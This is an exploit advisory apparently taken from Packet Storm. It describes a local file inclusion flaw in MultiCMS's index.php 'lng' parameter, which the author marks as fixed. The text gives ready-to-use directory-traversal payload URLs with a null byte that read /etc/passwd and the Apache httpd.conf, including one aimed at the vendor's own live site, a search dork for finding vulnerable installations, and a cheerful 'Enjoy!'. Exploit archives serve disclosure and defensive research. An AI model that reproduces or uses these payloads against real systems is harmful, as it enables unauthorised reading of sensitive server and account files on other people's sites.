MultiCMS suffers from a local file inclusion vulnerability.
e9c0392aaee24d08459529c7959139af7991ef5ef803940ae976eec0d2000882=============================www[dot]Whiteponny[dot]com=============================
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcní systém MultiCMS"
# Mail: defrontliner@whiteponny.com
================================================================================
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
# Ex: http://www.multicms.net/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
Enjoy! :D
================================================================================
Thanks To: Madonk "Makasih udah nemenin Scan :D"
S3T4N a.k.a Zeth.
All My Friends
=============================www[dot]Whiteponny[dot]com=============================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed